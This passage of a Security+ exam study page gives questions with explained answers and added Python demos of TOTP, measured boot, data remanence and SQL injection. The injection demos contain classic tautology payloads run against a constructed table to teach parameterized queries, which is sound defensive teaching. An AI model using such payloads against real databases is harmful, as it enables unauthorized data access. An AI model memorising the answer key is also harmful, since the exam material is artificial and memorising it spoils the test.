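    secret = b"12345678901234567890"   # shared secret from the RFC 4226 test vectors
    for c in range(3):
        print("HOTP counter", c, "->", hotp(secret, c))
    print("TOTP at t=59 (8 digits) ->", totp(secret, at=59, digits=8))
    print("current TOTP ->", totp(secret))
```

A TOTP code reused inside its 30-second step is still a replayed code, so a real verifier also remembers the last accepted time step per user and refuses anything at or before it, just as the HOTP verifier advances its counter.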

Which of the following security actions should be completed before a user is given access to the network?

Identification and authentication Before users are given access to a network, they need to identify themselves in one or more ways and be authenticated via whatever system is in place. After they are given access to the network, they can later be authorized to individual resources. The authentication step cannot be skipped.

Which type of vulnerability is demonstrated by buffer overflows?

Improper input handling A buffer overflow is an example of improper input handling, and the impact can include crashing the application. Other examples of improper input handling include failure to validate the type of data in an input field, the length of the data, and proper date ranges. Improper error handling is a different weakness: it could allow an attacker to crash a program. Error checking should be built into every module or code function, and an error should not result in a crashed application, but rather generate an error message. Misconfiguration or weak configuration is also a different weakness, although it can have a severe impact. For example, a user who (for convenience) selects weak or minimal security settings on a browser may impact the security of the entire organization. Misconfiguration, such as not changing the administrative user name or password, can also have a significant impact. Systems and components, such as routers, should never be deployed with the default configuration enabled. As an example, many SOHO users are thrilled that they got their new wireless network to finally communicate "out of the box." As a result, they do not change the default administrator information, leaving their network wide open for attack.

Which of the following programming techniques can stop buffer overflow attacks?

Input validation Input validation is the best programming technique to stop buffer overflow attacks and is also used to prevent SQL injection attacks. A SQL injection attack is a code injection technique where SQL statements are inserted into fields of an application. A sandbox is used to run the web scripts in their own testing environment. Backdoors are used in computer programs to bypass normal authentication. Backdoor analysis includes checking the operating system, applications, and firmware on devices and making sure they are updated.
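Because the answer above names input validation as the defense for both overflows and SQL injection, here is an added example (not code from the original page) of the SQL injection half, in Python against an in-memory SQLite table. The table, the accounts in it and the `USERNAME_RE` policy are constructed for the illustration, and passwords are stored in plaintext only to keep the demo short (in practice they would be stretched as in the bcrypt/PBKDF2 answer earlier on this page). `login_vulnerable` builds the statement by string concatenation; `login_safe` validates the user name against an allowlist and passes both values as query parameters, so the data can never change the shape of the query.

```python
import re
import sqlite3
from typing import Optional, Tuple

# Assumption: the site's user name policy, used as an allowlist.
USERNAME_RE = re.compile(r"[a-z0-9_]{3,32}")


def setup_db() -> sqlite3.Connection:
    """Constructed in-memory users table for the demo."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT PRIMARY KEY, password TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [("alice", "s3cret", "admin"), ("bob", "hunter2", "user")])
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, name: str,
                     password: str) -> Optional[Tuple[str, str]]:
    """String concatenation: user input becomes part of the SQL statement."""
    sql = (f"SELECT name, role FROM users "
           f"WHERE name = '{name}' AND password = '{password}'")
    return conn.execute(sql).fetchone()


def login_safe(conn: sqlite3.Connection, name: str,
               password: str) -> Optional[Tuple[str, str]]:
    """Allowlist validation plus a parameterized query."""
    if not USERNAME_RE.fullmatch(name):
        return None                             # reject before touching the database
    sql = "SELECT name, role FROM users WHERE name = ? AND password = ?"
    return conn.execute(sql, (name, password)).fetchone()


if __name__ == "__main__":
    conn = setup_db()
    payload = "' OR '1'='1"                     # classic injection in the password field
    print("vulnerable, injected password:", login_vulnerable(conn, "alice", payload))
    print("safe, injected password:     ", login_safe(conn, "alice", payload))
    print("vulnerable, injected name:   ", login_vulnerable(conn, "x' OR 1=1 --", ""))
    print("safe, injected name:         ", login_safe(conn, "x' OR 1=1 --", ""))
    print("safe, correct credentials:   ", login_safe(conn, "bob", "hunter2"))
```

The injected password turns the predicate into `(name = 'alice' AND password = '') OR '1'='1'`, which is true for every row; the parameterized query compares the literal string `' OR '1'='1` against the stored password and finds nothing. Validation is the first line and parameterization the one that actually closes the hole, since a password field usually cannot be restricted to a narrow character set.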

Which of the following is a step in deploying a WPA2-Enterprise wireless network?

Install a digital certificate on the authentication server If you are running a WPA2-Enterprise wireless network, then the wireless access point (WAP) will need to access a RADIUS server for the authentication portion of the wireless connection. This scenario calls for a digital certificate to be loaded on the RADIUS server. A DHCP server might be utilized at the WAP (or other all-in-one network device), or there could be a separate DHCP server, but this is a different task altogether that the RADIUS server is not normally responsible for. The RADIUS server needs a digital certificate; the encryption key for WPA2 would be stored on the WAP. A token is not necessary, but is often used with swipeable smart cards for physical authentication.

NTLM is for the most part backward compatible and is an improved version of which of the following?

LANMAN LANMAN is an outdated hash used in Windows; it is the original hash used to store passwords. The NTLM (and the newer NTLMv2) hash is used in newer versions of Windows to replace LANMAN. AES is the Advanced Encryption Standard, a popular encryption method. MD5 is a different hash function used, among other things, to check downloaded files. Passwd (/etc/passwd) is a text-based file used in Linux and Unix that stores account information; on modern systems the password hashes themselves are kept in the restricted /etc/shadow file.

PAT

Like NAT, but it translates both IP addresses and port numbers.

You and several others on the IT team are deciding on an access control model. The IT director wants to implement the strictest access control model available, ensuring that data is kept as secure as possible. Which of the following access control models should you and your IT team implement?

Mandatory access control Mandatory access control (MAC) is the strictest access control model listed in the answers. It is a well-defined model used primarily by the government. It uses security labels to define resources. In the discretionary access control (DAC) model, the owner decides which users are allowed to have access to objects; it is not as strict as MAC. Role-based access control (RBAC) is an access model that, like MAC, is controlled by the system but differs from MAC in the way permissions are configured; it is not as strict as MAC.

Which of these vulnerabilities is characterized by a user modifying a browser's security settings to make it more convenient to visit web sites?

Misconfiguration/weak configuration If a user modifies a browser's security settings to make it more convenient to visit web sites, such as turning off pop-up blockers and anti-phishing controls, this is an example of weak configuration. Misconfiguration and weak configuration can have a severe impact on the entire organization. Misconfiguration, such as not changing the default administrative user name or password, can also have a significant impact. Answer D is incorrect. An SQL injection is an example of improper input handling, and the impact can include data destruction or unfettered access to the database. Inputs should be checked for common SQL injection symbols. Other examples of improper input handling include failure to validate the type of data in an input field, the length of the data, and proper date ranges. Answer A is incorrect. Improper error handling could allow an attacker to crash a program. Error checking should be built into every module or code function. An error should not result in a crashed application, but rather generate an error message. Answer B is incorrect. Systems and components, such as routers, should never be deployed with the default configuration enabled. As an example, many SOHO users are thrilled that they got their new wireless network to finally communicate "out of the box." As a result, they do not change the default administrator information, leaving their network wide open for attack.

Which of the following will identify a Smurf attack?

NIDS A NIDS (network intrusion detection system) is designed to identify network attacks such as a Smurf attack (a type of DoS). Firewalls can block particular packets or IP addresses, but they don't identify actual attacks. Content filters are used to secure users' web browsing sessions, filtering out unwanted websites. Load balancers are used to distribute workload among multiple servers.

You are configuring security for a network that is isolated from the Internet by a perimeter network. You need to test the network's ability to detect and respond to a DoS attack. What should you implement?

Pen testing Penetration testing is required in this scenario. The only way to simulate a denial of service (DoS) attack is to actively test the network with a penetration test of your own design. All of the other methods are passive attempts at testing the network. A vulnerability scan is generally considered to be the most passive (or least invasive) of the answers. A port scan is fairly passive as well; it only identifies open ports and does not attempt to access those ports any further. Network packet analysis is a bit more active in that it will allow you to disassemble packets coming from the source; however, it does not actively solicit new information or make new connections to the host as a penetration test will.

Which of the following methods is the most closely associated with DLL injection?

Penetration testing Penetration testing is the method most closely associated with DLL injection, which is a technique used to run code within the address space of another process by forcing it to load a dynamic link library. It is used to influence the behavior of a program in a way that the creator of the program did not intend. On Windows, injection can also be made persistent through the Registry (for example, a Registry value that lists DLLs to be loaded into processes when they start). Penetration testing is a type of active security analysis used to find out whether DLL injection attempts will work. The other three answers are passive forms of security analysis. Vulnerability assessment can find open ports and define the threats associated with those ports. Performance monitoring can analyze a server's resources such as CPU and RAM. Auditing is making a technical assessment of applications, systems, and networks. Auditing often includes reviewing security logs, vulnerability scans, performance logs, and policies.

Tara has written an application and is ready to go through the hardening process. Which of the following could be considered a hardening process of the SDLC?

Secure coding concepts Secure coding concepts such as input validation will help to harden an application within the systems development life cycle (SDLC). Although disabling unnecessary services and accounts and patching the application are important, these could all be considered application or server hardening, not hardening within the SDLC.

NAC-network access control

Sets the rules by which connections to a network are governed.

You have been asked to implement the encryption standard that is used in the Clipper Chip. Which encryption standard should you use?

Skipjack Skipjack is a symmetric (private key) block cipher that was developed by the U.S. government for the Clipper Chip. Skipjack uses an 80-bit key, which offers far less margin than the 128-bit minimum recommended today and is considered too short by modern standards. Advanced Encryption Standard (AES) is a newer encryption standard that uses the Rijndael algorithm with 128-bit, 192-bit, or 256-bit keys. AES-256 is stronger than DES, 3DES, or RC4 (SHA is a hash function, not an encryption algorithm, so it is not comparable). Blowfish is a symmetric encryption algorithm that was developed for optimal performance on 32-bit central processing units (CPUs). Blowfish supports keys up to 448 bits in length. Data Encryption Standard (DES) is an older symmetric encryption algorithm that was developed by IBM in the 1970s. DES uses 56-bit keys on 64-bit data blocks.

Your users often forget their passwords and ask for assistance. You send a link to reset the password. You would like to incorporate a time limit for the user to respond to the link. Which would you incorporate?

TOTP Time-based One-Time Passwords (TOTP) are valid only for a specific time window. Once it is used or its time window expires, the TOTP is no longer valid, which makes it a natural fit for a reset link that must be acted on within a set period. HOTP and TOTP are both types of one-time passwords (i.e., they can only be used once). Answer D is incorrect. HMAC-based One-Time Passwords (HOTP) are counter-based rather than time-based, so they do not expire on their own; they are commonly used with hardware tokens. Answer C is incorrect. Attribute-based access control (ABAC) goes beyond authentication based on user name and password. It evaluates other attributes, such as time of day and location of logons. Another aspect would be a user who has read access to files but is attempting to edit or delete files remotely. Answer B is incorrect. False rejection rate (FRR) is one way to measure the accuracy of a biometric authentication system. It measures how likely it is that an authorized user is denied access to the system. Expressed as a ratio, it is the number of authorized users who were denied access to the protected system divided by the number of authentication attempts. False rejections can occur if the system settings are too strict, or if users are not trained properly on biometric login procedures. By contrast, false acceptance rate (FAR) measures how likely it is that an unauthorized user is granted access to the system. Its ratio is the number of unauthorized users who were incorrectly allowed access to the protected system divided by the number of authentication attempts. FAR can happen because the system was not precise enough when matching against the enrolled user. Crossover error rate (CER) is the point where FAR and FRR are equal. Generally, a lower CER value indicates a more accurate system. CER is primarily used to compare biometric authentication systems. Other considerations include proximity cards, smart cards, tokens, CAC, PIV, and file security. Smart cards have permissions and access information stored on the card. The greatest concern with smart cards is theft.
Once stolen, the thief can use the card in the same manner as the rightful owner, which is why a smart card should be paired with a PIN or biometric as a second factor. As an example, if the user has access to a highly secure area by using the smart card, a thief would have the same access when using the stolen card. Proximity cards are a type of smart card that incorporates Radio Frequency Identification (RFID) chips. These chips contain authentication information and transmit over a very short range. When the authentication device is within range of the proximity card, and the information transmitted is correct, authentication is granted. Hardware tokens (or physical tokens) include such physical devices as wireless key cards, key fobs, and smart cards. Software tokens are a component of two-factor authentication systems. They are usually installed on a device (such as an authenticator app on a phone) and used to authenticate the user. A common access card (CAC) is a smart card issued by the Department of Defense (DoD) to military personnel and contractors. They incorporate a picture, integrated chip, two bar codes and a magnetic strip. They can be used for visual identification and for login. A Personal Identity Verification (PIV) smart card is issued to non-military federal employees and contractors. They incorporate a picture, integrated chip, two bar codes and a magnetic strip. They can be used for visual identification and for login. File system security should always be set to only allow what is absolutely essential for the user to do their job. This is also known as the principle of least privilege.
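As an added example (not code from the original page), here is a pure-Python implementation of HOTP (RFC 4226) and TOTP (RFC 6238), plus a verifier that accepts a code only inside a small window of time steps. The shared secret is the ASCII test secret from the RFCs, so the outputs can be checked against the published test vectors; the "reset link" use at the bottom is an assumed scenario, not something the page describes.

```python
"""Added example: RFC 4226 HOTP and RFC 6238 TOTP in pure Python.
Not code from the original page. Standard library only."""
import hashlib
import hmac
import struct
import time

# RFC 4226 / RFC 6238 reference secret (ASCII "12345678901234567890").
TEST_SECRET = b"12345678901234567890"


def hotp(secret, counter, digits=6):
    """Counter-based one-time password (RFC 4226).

    HMAC-SHA1 over the 8-byte big-endian counter, dynamic truncation to a
    31-bit integer, then reduce modulo 10**digits and zero-pad."""
    msg = struct.pack(">Q", counter)
    mac = hmac.new(secret, msg, hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


def totp(secret, at, step=30, digits=6, t0=0):
    """Time-based one-time password (RFC 6238): HOTP where the counter is
    the number of `step`-second intervals elapsed since t0."""
    return hotp(secret, (at - t0) // step, digits)


def verify_totp(secret, code, at, step=30, digits=6, window=1):
    """Accept the code for the current interval and `window` intervals on
    either side (tolerates clock skew). Anything outside that is expired.
    compare_digest keeps the comparison time independent of the input."""
    if not (code.isascii() and code.isdigit() and len(code) == digits):
        return False
    counter = at // step
    for c in range(counter - window, counter + window + 1):
        if hmac.compare_digest(hotp(secret, c, digits), code):
            return True
    return False


def main():
    # Assumed scenario: the code is embedded in a password-reset link and
    # must be presented before the window closes.
    now = int(time.time())
    code = totp(TEST_SECRET, now)
    print("reset code issued now:", code)
    print("valid immediately:    ", verify_totp(TEST_SECRET, code, now))
    print("valid 5 minutes later:", verify_totp(TEST_SECRET, code, now + 300))


if __name__ == "__main__":
    main()
```

A real reset flow would also record that the code has been consumed, since TOTP by itself only limits the time window and not the number of uses inside it.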

Which of the following protocols does the 802.11i standard support?

TKIP AES AES (Advanced Encryption Standard, used by WPA2 in CCMP mode) and TKIP (Temporal Key Integrity Protocol, the older WPA-era fallback) are supported by the 802.11i standard, which deals with wireless security. RSA is an asymmetric (public key) algorithm used for key exchange and digital signatures, not a link-layer cipher. ECC (elliptic curve cryptography) is another asymmetric approach, and DES is an obsolete symmetric block cipher; none of these is part of 802.11i.

measured boot

Takes measurements (hashes) of each component in the boot chain, such as firmware, bootloader and kernel, records them in the TPM's Platform Configuration Registers (PCRs), has the TPM sign those results, and reports them to a trusted third party such as a remote attestation service, which compares them against known-good values.
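As an added example (not code from the original page), a small Python model of the mechanism: each boot stage hashes the next and extends a PCR, and the attestation service replays the reported event log to reproduce the PCR and compares it with a known-good value. The boot components are constructed byte strings, and the TPM's signature over the PCR (the quote) is left out; the PCR value is assumed to reach the verifier intact.

```python
"""Added example (not from the original page): measured boot into a
PCR and verification by event-log replay. Sample components are
constructed byte strings, not real firmware."""
import hashlib

PCR_RESET = bytes(32)  # a SHA-256 PCR bank starts at all zeros on reset


def extend(pcr, measurement):
    """TPM PCR extend: the register becomes H(old value || measurement).
    It is one-way and order-sensitive: you can add to a PCR, never rewind it."""
    return hashlib.sha256(pcr + measurement).digest()


def measure_boot(components):
    """Each stage hashes the next component and extends the PCR before
    handing over control. Returns (final PCR, event log of measurements)."""
    pcr = PCR_RESET
    log = []
    for name, blob in components:
        digest = hashlib.sha256(blob).digest()
        log.append((name, digest))
        pcr = extend(pcr, digest)
    return pcr, log


def replay_log(log):
    """What the attestation service does: recompute the PCR from the
    reported event log, starting from the reset value."""
    pcr = PCR_RESET
    for _name, digest in log:
        pcr = extend(pcr, digest)
    return pcr


def verify_attestation(reported_pcr, log, golden_pcr):
    """Accept only if the log reproduces the reported PCR and that PCR
    equals the known-good value recorded for the approved software."""
    return replay_log(log) == reported_pcr and reported_pcr == golden_pcr


# Constructed boot chain for the demo.
GOOD_CHAIN = [
    ("firmware", b"UEFI firmware image v1.2"),
    ("bootloader", b"shim + grub signed build 42"),
    ("kernel", b"vmlinuz-6.1 plus initrd"),
]
# Same kernel with one byte changed, as a bootkit would leave behind.
TAMPERED_CHAIN = GOOD_CHAIN[:2] + [("kernel", b"vmlinuz-6.1 plus initrd!")]
# Same components measured in a different order.
REORDERED_CHAIN = list(reversed(GOOD_CHAIN))


def main():
    golden, _ = measure_boot(GOOD_CHAIN)
    for label, chain in (("good", GOOD_CHAIN), ("tampered", TAMPERED_CHAIN),
                         ("reordered", REORDERED_CHAIN)):
        pcr, log = measure_boot(chain)
        print(f"{label:9s} pcr={pcr.hex()[:16]}... "
              f"accepted={verify_attestation(pcr, log, golden)}")


if __name__ == "__main__":
    main()
```

Because extend is a chained hash, the verifier does not need to trust the log itself: a log that has been edited will not replay to the PCR the TPM reports.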

VLAN hopping

The act of gaining access to traffic on other VLANs that would not normally be accessible by jumping from one VLAN to another.

war-dialing

The act of scanning telephone numbers by dialing them one at a time and adding them to a list, in an attempt to gain access to computer networks.

You are a security administrator for a midsized company that uses several applications on its client computers. After the installation of a specialized program on one computer, a software application executed an online activation process. Then, a few months later, the computer experienced a hardware failure. A backup image of the operating system was restored on a newer revision of the same brand and model computer. After that restoration, the specialized program no longer works. Which of the following is the most likely cause of the problem?

The hash key summary of the hardware and the specialized program no longer match. Some software activations are based on a hardware key, or a hardware key and a software key that are compared. The key is normally a hash value (computed with either MD5 or SHA-256, for instance) over hardware identifiers such as motherboard, CPU and disk serial numbers; the newer hardware revision produces different identifiers, so the hash values don't match, and the specialized program cannot complete the online activation process that is required again because the image was restored to a different computer. This is the most likely cause, but not the only possible reason why the specialized program stopped functioning. If the image file to be restored had been encrypted with the wrong key, then you wouldn't have been able to complete the restoration at all, and the computer would not function. In trusted computing, remote attestation is when a client computer authenticates its hardware and software configuration to a remote server with the goal of determining the level of trust, often using a PKI. Remote attestation might indeed be failing, but that is unlikely to be caused by blocked ports: the software configuration of the affected computer should not have changed, even after the restoration, and the scenario doesn't mention any network changes, so the configuration of ports, ACLs, and so on should be the same. The least likely answer is that the binary files of the specialized program have been modified by malware. Malware can tamper with program binaries, but that would not coincide with the hardware change, and most vendors digitally sign their executables (code signing), so a modified binary would fail signature verification rather than silently misbehave.

You are contracted with a customer to protect its user data. The customer requires the following: Easy backup of all user data Minimizing the risk of physical data theft Minimizing the impact of failure on any one file server

Use file servers with removable hard disks. Secure the hard disks in a separate area after hours. Using file servers with removable hard disks is the best answer. All the other answers do not offer easy backup of user data. The time it would take to use separate USB hard disks makes it anything but easy. The idea of locking entire servers in a secure area doesn't sound easy either. However, securing removable hard disks in a separate area seems like an easy way to implement the solution. It should also minimize the risk of physical data theft because the hard disks are stored in a secure area. Using multiple file servers should minimize the impact of failure on any one file server.

Which of the following can be implemented in hardware or software to protect a web server from XSS attacks?

WAF A WAF (web application firewall) can be implemented as hardware or software. Among other things it can protect from XSS (cross-site scripting) and SQL injection attacks. The WAF can be an appliance, server software, or plug-in, and applies a set of rules to HTTP sessions to protect from various attacks. WebKnight and ModSecurity are examples of open source WAFs. Unlike other devices such as network intrusion detection systems (NIDSs), routers, and some firewalls, the WAF operates at layer 7 of the OSI model (application layer). A WAF is a compensating control, though; rule sets can be bypassed, so the application itself still needs to encode output and validate input. A flood guard is a separate feature of firewalls that can protect against SYN flood attacks. IDS stands for intrusion detection system, a device or software that monitors network activities and alerts an administrator to various types of malicious activities. A URL content filter is a software filter that monitors for specific URLs (domain names and website names) that are undesirable and disallows access to them.

Which type of malware does not require a user to execute a program to distribute the software?

Worm

Your company's network has multiple networks that are connected via different devices. Which device is designed to provide the most efficient transmission of traffic that is NOT specifically denied between networks?

a router A router is a device that is designed to transmit all data that is not specifically denied between networks, and to do so in the most efficient manner possible. A router enables connectivity between two or more networks and can connect multiple network segments into one network. Answers C, D, and A are incorrect. A firewall is a mechanism that is designed to deny transmission of data that is not specifically allowed. For example, a firewall can be configured to ensure that messages on a TCP/IP subnet stay local to the subnet. Additionally, a firewall can be used to restrict access to a private network from the Internet. A hub and a repeater are central network connection devices that are designed to transmit data between computers on the same subnet. Hubs and repeaters are not used to transmit data between subnets.

You collect evidence after an attack has occurred. You need to ensure that the evidence collected follows chain of custody procedures. Which stage is NOT a part of the life cycle of evidence?

accreditation Accreditation is not a part of the life cycle of evidence. Accreditation is the process in which management accepts a system's functionality and assurance. Accreditation represents the satisfaction of management regarding the adequacy of the product with respect to functionality and assurance after the evaluation process is over. The stages in the life cycle of evidence, or the chain of custody, are as follows:
collection of evidence from the site
analysis of the evidence by a team of experts
storage of the evidence in a secure place to ensure that the evidence is not tampered with
presentation of the evidence by legal experts in a court of law
returning the evidence to the owner after the proceedings are over
Most computer-related evidence is hearsay in nature and can be easily dismissed in court because of its volatile nature, so every hand-off should be documented (who, what, when, where, and the hash of any image taken). Strict and organized procedures should be followed for collection, analysis, and handling of evidence.

Which of the following secure coding techniques protects against injection attacks?

stored procedures Stored procedures are series of SQL statements that are executed as a group, and are similar to scripts. Properly written stored procedures protect the database from damage caused by poorly written SQL statements and from SQL injection attacks, because the query structure is fixed on the server and user input is passed only as parameters. The caveat is that a stored procedure that builds dynamic SQL by concatenating its arguments is just as injectable as inline SQL; the protection comes from parameterization, which parameterized (prepared) statements provide in the same way. The purpose of an SQL injection attack is to read sensitive data from the database, modify the data, execute administrative operations on the database, recover the content of a given file, and in some configurations even issue commands to the operating system. Answer D is incorrect. Obfuscation and camouflage are closely related. Obfuscation means to make something difficult to understand, and camouflage means to hide something among its surroundings and make it more difficult to detect. The purpose of both is to make it more difficult for someone to tamper with code or reverse engineer the code, but they will not protect against injection attacks. Answer C is incorrect. Error handling means that invalid input or unexpected conditions are caught and produce a controlled error message instead of a crash (input validation, a related technique, checks every input against a range of acceptable values and rejects anything outside it). Program crashes occur when an invalid input produces unexpected results. SQL injection attacks usually do not produce errors, so error handling alone would not stop them. Answer B is incorrect. Provisioning and deprovisioning allocate and release resources based on demand for those resources. They will not protect against injection attacks. Other secure coding techniques and issues include encryption, code signing, code reuse, dead code, server-side versus client-side execution and validation, memory management, third-party SDKs, and data exposure. Encryption should be used in software development, as well as for network traffic, to protect data being stored or transmitted. Code signing embeds a digital signature into a piece of software, and is often used with device drivers. Validating the signature ensures that you are installing software that is from the vendor.
Code reuse and dead code are closely related. Reused code may carry vulnerabilities from the context it was written for, or may simply be outdated; dead code is code that is present in the program but never executed, which still has to be maintained and reviewed and should be removed. When comparing server-side versus client-side execution and validation, server-side validation happens on the server when the data arrives there. Client-side validation occurs in the browser on the client machine. The good thing about client-side validation is that it provides a quicker response and does not generate a lot of overhead on the server. With that said, however, the client is under the attacker's control and its checks can be bypassed, so client-side validation is a usability feature and the server must validate everything again. Memory management watches for things like memory leaks. Memory leaks can be caused by a programmer failing to free memory once the process using that memory has completed. C and C++ are particularly prone to memory leaks. Use of third-party libraries and software development kits (SDKs), while common, presents security vulnerabilities. A flaw in an SDK can result in issues in every application that the SDK was used to develop. Data exposure occurs when there are not sufficient safeguards on a database. Failure to protect your database can result in data hijacking and injection attacks.
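As an added example (not code from the original page), the lookup below is written twice against an in-memory SQLite database with constructed rows: once by concatenating the input into the SQL string, and once as a parameterized statement. SQLite has no stored procedures, but the parameterized form gives the same property a well-written stored procedure does, namely that the query structure is fixed and the input can only ever be data.

```python
"""Added example (not from the original page): SQL injection sink and
its parameterized fix, run against SQLite with constructed rows."""
import sqlite3

SAMPLE_USERS = [  # constructed demo data
    ("alice", "admin"),
    ("bob", "user"),
    ("carol", "user"),
]


def setup():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, "
        "username TEXT NOT NULL, role TEXT NOT NULL)"
    )
    conn.executemany("INSERT INTO users (username, role) VALUES (?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, username):
    """Builds the SQL by pasting the input into the string, so the input
    can change the structure of the query (this is the injection sink)."""
    sql = "SELECT username, role FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, username):
    """The SQL text is constant; the driver binds the value separately, so
    quotes and keywords in the input are just characters to match."""
    return conn.execute(
        "SELECT username, role FROM users WHERE username = ?", (username,)
    ).fetchall()


def main():
    conn = setup()
    # Classic tautology: the WHERE clause becomes  username = '' OR '1'='1'
    payload = "' OR '1'='1"
    print("vulnerable, normal input:", lookup_vulnerable(conn, "alice"))
    print("vulnerable, payload:     ", lookup_vulnerable(conn, payload))
    print("parameterized, normal:   ", lookup_parameterized(conn, "alice"))
    print("parameterized, payload:  ", lookup_parameterized(conn, payload))


if __name__ == "__main__":
    main()
```

With the payload, the vulnerable query returns every row in the table, while the parameterized query looks for a user literally named `' OR '1'='1` and returns nothing.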

You need to remove data from a storage media that is used to store confidential information. Which method is NOT recommended?

formatting Formatting is not a recommended method. Formatting or deleting the data from a storage medium, such as a hard drive, does not ensure the actual removal of the data; it removes the pointers (file system metadata) to the location where the data resides, and the data blocks themselves remain until they happen to be overwritten. The residual data on the storage media is referred to as data remanence. The main issue with media reuse is remanence. The residual data can be recovered by using data recovery procedures such as file carving. This can pose a serious security threat if the erased information is confidential in nature. Sanitization is the process of wiping the storage media to ensure that its data cannot be recovered or reused. Sanitization includes several methods, such as zeroization (overwriting), degaussing, and media destruction. All of these methods can be used to remove data from storage media, depending on the type of media used. Most storage media with a magnetic base can be sanitized by degaussing. However, CDs and DVDs cannot be degaussed because they are optical, not magnetic. If this is the case, the only option is physical destruction of the CD or DVD. Answer B is incorrect. Zeroization implies that a storage medium is overwritten, often repeatedly, with null values or patterns of ones and zeros, for sanitization. Answer C is incorrect. Degaussing is the process of reducing or eliminating an unwanted magnetic field on a storage medium. Degaussing sanitizes storage media by using magnetic forces. Degaussing devices produce powerful opposing magnetic fields that reduce the magnetic flux density of the storage media to zero. Degaussing is the preferred method for erasing data from magnetic media, such as floppy disks, hard drives, and magnetic tapes (and it renders a modern hard drive unusable, since the factory-written servo tracks are destroyed along with the data). Media destruction implies physically destroying the media to make it unusable. Security of the storage media can be crucial if the data stored is of a confidential nature. Some storage media, such as CD-ROMs, cannot be degaussed due to the lack of a magnetic base.
Therefore, it is recommended that you physically destroy them to prevent disclosure of confidential information. Answer D is incorrect. Data destruction and media sanitization methods that are covered on the Security+ exam include burning, shredding, pulping, pulverizing, degaussing, purging, and wiping. Burning, shredding, and pulping are most often used for documents and paper. Pulverizing, degaussing, purging, and wiping are most often used for storage media, such as hard drives and flash drives. Pulverizing is a form of physical destruction of the media. Degaussing eliminates the magnetic field. Purging renders data unrecoverable, while wiping or clearing removes the data. Degaussing is considered a form of purging, while overwriting is considered a form of wiping. Note that overwriting is unreliable on SSDs and other flash media, because wear leveling and over-provisioned blocks are not reachable by normal writes; use the drive's built-in secure erase (or cryptographic erase) or destroy the device. Media viability controls are used to protect the viability of data storage media. Media viability control measures include proper labeling or marking, secure handling and storage, and storage media disposal. When implementing appropriate controls to ensure data security, you need to design the appropriate data policies, including the following:
Data wiping - ensures that the contents of the media are no longer accessible.
Data disposing - destroys the media to ensure that the media is unusable.
Data retention - ensures that data is retained for a certain period. The data retention policies should also define the different data types and data labeling techniques to be used.
Data storage - ensures that data is stored in appropriate locations. In most cases, two copies of data should be retained and placed in different geographic locations.
If an administrator wants to ensure that the reclaimed space of a hard drive has been sanitized while the computer is in use, they should implement cluster tip wiping. A cluster tip is the unused space at the end of a file's last cluster. If you have a file written on 7.1 clusters, there will be a 0.9 cluster tip containing old or zero data.
Cluster tips could contain some sensitive information. No matter which type of media you must dispose of or reuse, you need to ensure that your organization understands the legal and compliance issues that will affect the disposal. Certain types of protected data, such as personally identifiable information (PII) or personal health information (PHI), may require special handling when stored on media.
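As an added example (not from the original page), the following Python models a tiny block device with a one-sector allocation table to make the difference concrete: a quick format clears only the table, so carving the raw sectors still recovers the file, whereas overwriting every sector leaves nothing to recover. The disk layout, file name, contents and signature searched for are all constructed for the demo.

```python
"""Added example (not from the original page): a toy block device that
shows data remanence after a quick format versus overwriting.
Layout, file contents and carving marker are constructed for the demo."""
import os

SECTOR = 64
SECTORS = 16  # sector 0 holds the allocation table, sectors 1..15 hold data


class ToyDisk:
    def __init__(self):
        self.media = bytearray(SECTOR * SECTORS)

    # --- allocation table in sector 0: "name:start:length;" entries ---
    def _table(self):
        raw = bytes(self.media[:SECTOR]).rstrip(b"\x00").decode()
        entries = {}
        for item in filter(None, raw.split(";")):
            name, start, length = item.split(":")
            entries[name] = (int(start), int(length))
        return entries

    def _next_free_sector(self):
        used = [s + (n + SECTOR - 1) // SECTOR for s, n in self._table().values()]
        return max(used, default=1)

    def write_file(self, name, data):
        start = self._next_free_sector()
        if start * SECTOR + len(data) > len(self.media):
            raise ValueError("disk full")
        entry = f"{name}:{start}:{len(data)};".encode()
        table = bytes(self.media[:SECTOR]).rstrip(b"\x00") + entry
        if len(table) > SECTOR:
            raise ValueError("allocation table full")
        self.media[start * SECTOR:start * SECTOR + len(data)] = data
        self.media[:SECTOR] = table.ljust(SECTOR, b"\x00")

    def read_file(self, name):
        entry = self._table().get(name)
        if entry is None:
            return None
        start, length = entry
        return bytes(self.media[start * SECTOR:start * SECTOR + length])

    # --- the two operations the question contrasts ---
    def quick_format(self):
        """Clears only the allocation table; every data sector is untouched."""
        self.media[:SECTOR] = bytes(SECTOR)

    def zeroize(self, passes=1):
        """Overwrites every sector with random data for each pass, then with
        zeros, so nothing of the old contents survives anywhere on the media."""
        for _ in range(passes):
            self.media[:] = os.urandom(len(self.media))
        self.media[:] = bytes(len(self.media))


def carve(disk, marker):
    """File carving: ignore the file system and scan raw data sectors for a
    known signature, the way recovery tools find 'deleted' files.
    Each hit is read up to the next NUL byte (the sector padding)."""
    found = []
    raw = bytes(disk.media[SECTOR:])
    pos = raw.find(marker)
    while pos != -1:
        end = raw.find(b"\x00", pos)
        found.append(raw[pos:end if end != -1 else len(raw)])
        pos = raw.find(marker, pos + 1)
    return found


def main():
    disk = ToyDisk()
    disk.write_file("payroll.txt", b"CONFIDENTIAL: payroll Q3 salaries")
    disk.quick_format()
    print("after format, read_file:", disk.read_file("payroll.txt"))
    print("after format, carving:  ", carve(disk, b"CONFIDENTIAL"))
    disk.zeroize(passes=3)
    print("after zeroize, carving: ", carve(disk, b"CONFIDENTIAL"))


if __name__ == "__main__":
    main()
```

The same gap exists on a real drive: after a format the directory structures are gone, but the clusters (and cluster tips) still hold the old bytes until something writes over them.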

Which penetration-testing concept compromises one system so that it can be used to attack another system?

